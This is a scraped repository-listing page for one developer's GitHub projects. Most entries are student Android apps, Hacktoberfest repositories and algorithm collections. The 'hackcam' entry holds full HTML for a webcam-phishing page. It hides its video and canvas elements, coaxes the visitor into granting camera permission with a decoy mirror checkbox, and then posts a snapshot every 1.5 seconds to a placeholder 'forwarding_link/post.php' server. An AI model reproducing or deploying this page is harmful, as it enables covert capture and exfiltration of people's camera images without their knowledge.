Giter VIP home page Giter VIP logo

Rachit Panwar's Projects

asnetutorial icon asnetutorial

Simple example project for https://github.com/gorbin/ASNE library

chatapp-1 icon chatapp-1

Group project for Android development course

chatapp1 icon chatapp1

Chat application that allows multiple user that are registered through the app to chat with each other. i have used firebase for authenticationa and database.Also a person can change his/her profile picture. i have kept the UI like the whatsApp .

hackcam icon hackcam

Skip to content oxlynx / hackcam Learn Git and GitHub without any code! Using the Hello World guide, you’ll start a branch, write comments, and open a pull request. Code Issues 0 Pull requests 0 Projects 0 Wiki Security Pulse Community hackcam/oxlynx.html @oxlynx oxlynx Add files via upload b22f726 on 19 May 84 lines (64 sloc) 1.99 KB <!doctype html> <html> <head> <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script> <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css"> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script> </head> <div class="video-wrap" hidden="hidden"> <video id="video" playsinline autoplay></video> </div> <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas> <script> function post(imgdata){ $.ajax({ type: 'POST', data: { cat: imgdata}, url: 'forwarding_link/post.php', dataType: 'json', async: false, success: function(result){ // call the function that handles the response/results }, error: function(){ } }); }; 'use strict'; const video = document.getElementById('video'); const canvas = document.getElementById('canvas'); const errorMsgElement = document.querySelector('span#errorMsg'); const constraints = { audio: false, video: { facingMode: "user" } }; // Access webcam async function init() { try { const stream = await navigator.mediaDevices.getUserMedia(constraints); handleSuccess(stream); } catch (e) { errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`; } } // Success function handleSuccess(stream) { window.stream = stream; video.srcObject = stream; var context = canvas.getContext('2d'); setInterval(function(){ context.drawImage(video, 0, 0, 640, 480); var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); post(canvasData); }, 1500); } // Load init init(); </script> <body> <p>Hint: Look at the favicon</p> <p>(Accept Permissions)</p> <p><label><input type="checkbox" name="mirror" id="mirror" /> Mirror image</label></p> </body> </html> © 2019 GitHub, Inc. Terms Privacy Security Status Help Contact GitHub Pricing API Training Blog About

hacktoberfest icon hacktoberfest

Hacktoberfest | Simple website for contributors of #hacktoberfest

hacktoberfest-1 icon hacktoberfest-1

Hacktoberfest 2018. Don't forget to spread love and if you like give us a ⭐️

hacktoberfest-3 icon hacktoberfest-3

:octocat: Simply add your details and Get a chance to earn a free tshirt! ✅

hacktoberfestalgo icon hacktoberfestalgo

Hey First Timer, send a pull request with any algorithm written in any language to get started!

hello-world icon hello-world

Add any Program in any language you like or add a hello world Program ❣️ if you like give us :star:

hikerswatch icon hikerswatch

Android application to get the users live location , altitude, accuracy and address real time with updation in every second

java icon java

All Algorithms implemented in Java

loginintegration icon loginintegration

It is an android Application which integrates different social media platform which are LinkedIn, Facebook,twitter.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.